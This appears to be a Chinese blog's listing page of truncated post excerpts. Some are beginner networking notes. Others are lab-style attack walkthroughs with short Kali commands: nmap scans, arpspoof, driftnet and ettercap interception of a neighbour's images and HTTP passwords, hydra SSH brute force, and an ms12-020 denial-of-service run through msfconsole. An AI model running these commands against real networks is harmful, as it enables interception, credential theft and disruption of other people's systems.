- 博客(12)
- 收藏
- 关注
RSS订阅原创 系统漏洞攻击之蓝屏警告
利用系统在带的漏洞实施攻击实验工具1,kali一台2,Windows 2003 一台3,nmap 端口扫描工具4,msfconsole 攻击框架5,ms12-020 系统漏洞实验环境Windows2003,打开高危端口,关闭防火墙。kali进行攻击操作步骤1,扫描端口开放情况nmap -sP 192.168.3.1-255nmap -sS 192.168.3.162,打开攻击框架msfconsole3,msf > search dos //查看KALI漏
2020-06-30 22:05:40
1845
5
原创 内网渗透之抓取隔壁小姐姐上网图片
arp欺骗,利用中间人攻击原理,对内网的用户实施欺骗,从而到达目的。中间人攻击原理:两边通信的要经过黑客才能把信息转发给对方,从而导致信息泄露。实验工具:kali linuxnmaparpspoofdriftnet操作步骤:1,扫描主机nmap -sP 192.168.1.1-255nmap -sS 192.168.1.1-2552,开启IP转发,root@kali:~# echo “1” >> /proc/sys/net/ipv4/ip_forwardroot@
2020-06-30 15:17:45
3855
3
原创 内网渗透之谁动了我的密码,http密码抓获。
通过内网欺骗抓取网站密码实验工具(都是kali自带的)kali Linuxwin10电脑一台arpspoofettercap操作步骤1,开启IP转发root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward查看是否开启,有1就是开启,是0就是没有开启root@kali:~# cat /proc/sys/net/ipv4/ip_forward12,扫描肉鸡(我用自己的win10当肉鸡)root@kali:nmap -sS 19
2020-06-30 14:19:49
391
原创 常用的端口和协议
常见的端口和协议:20-----------ftp发送 , 文件传输协议21-----------ftp接收23----------Telnet53----------dns , 域名解析3389------ rdp , Windows远程端口22----------ssh , Linux远程端口67----------dhcp110---------pop3 , 邮局协议版本3143---------imap
2020-06-29 12:33:04
453
原创 ICMP协议讲解
ICMP协议的作用:用途说明:用来侦测或通知我了设备之间可能发生的各种各样的情况,了解网络设备之间的连接状况,ICMP协议主要用于网络中IP网络发送控制消息,提供可能发生 在通信环境中的各种问题的反馈,ICMP协议的应用:ICMP检测双向通路的连通性ping命令使用ICMP协议常见的ping反馈结果:Reply from 目标地址… //连接成功Destination host unreachable //目标主机不可达Request timed out //请求时间超时
2020-06-28 12:46:10
370
原创 TCP和UDP的应用场景
TCP:当 网络通信质量有要求是,比如整个数据要准确无误的传递给对方,通常要求可靠的应用,比如HTTP,HTTPS,FTP,等文件传输的协议POP、SMTP 等邮件传输的协议,常见使用的 TCP协议应用:有HTTP,FTP, POP,SMTP,Putty,Telnet ,SSH,QQ等文件传输,UDP:当强调传输性而不是传输的 完整性时,要求网络通信速度快,常见的UDP协议应用:QQ语音,QQ视频,等...
2020-06-23 11:47:31
702
原创 TCP和UDP协议讲解,简单通俗,
TCP和UDP的可以实现客服端/服务端的通信区别:TCP面向连接协议,可靠性高,适合传输大量的数据,但需要三次握手,数据补发过程耗时长,通信延迟大,UDP面向非连接协议,可靠性低,适合传输少量数据,但是连接速度快,低耗时,低延迟,...
2020-06-22 23:22:44
384
原创 nmap扫描工具简单使用教程
nmap -------一款强大的扫描工具(kali自带的工具),nmap 扫描类型 :tcp半开扫描tcp全开扫描udp扫描icmp扫描常见的扫描:nmap -sP 192.168.31.0/24 ------扫描该网段的主机nmap -sS 192.168.31.0/24 ------扫描该网段的主机和开放端口nmap -O 192.168.31.36 ------扫描操作系统nmap -sV 192.168.31.36 -----扫描应用程序以及版本nmap -sS -
2020-06-21 13:12:01
604
原创 mysql数据库密码爆破
mysql忘记密码爆破思路:1,停止mariadb服务2,跳过授权启动数据库进程3,重设管理密码4,关闭mysql——safe进程5,启动mariadb服务5,验证新密码步骤:1,停止mariadb服务[root@svr7 ~]# systemctl stop mariadb2,跳过授权启动数据库[root@svr7 ~]# mysqld_safe --skip-grant-tables &[1] 105799[root@svr7]#3,免密进入数据库[root
2020-06-15 20:47:08
2011
1
原创 暴力破解Centos7并登陆实验,
环境准备:1,kali2,centos73,hydra操作步骤:1,扫描网段里的目标主机nmap -sP 192.168.1.1-255 //扫描网段主机nmap -sS 192.168.1.188 //扫描端口开放情况扫描到22端口是开着的,进行下一步操作,2,暴力破解hydra -l root -P 1.1txt 192.168.1.188 ssh-l ------------------------- 指定用户-P --------
2020-06-15 13:24:40
645
原创 内网渗透之断网攻击实验和防御
ARP断网攻击:伪造IP地址和Mac地址实现ARP欺骗导致网络堵塞,攻击工具:kali一台arpspoof攻击步骤1,扫描局域网生存主机nmap -sP 192.168.31.1/242,进行ARP攻击arpspoof -i eth0 -t 192.168.31.175 192.168.31.1-i ------------指定网卡名-t ------------指定IP地址和网关3.对方不能上网,按Ctrl+c停止攻击防御:1.360里面添加下载流量防火墙,自动拦截并
2020-06-14 14:50:11
918
原创 dos,ddos,攻击实验
攻击简介:dos-------------------拒绝服务攻击ddos------------------分布式拒绝服务攻击总而原支就是让别人的电脑和服务器不能正常使用,实验环境:kali一台------------------------------2.win7一台
2020-06-14 14:28:48
4064
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人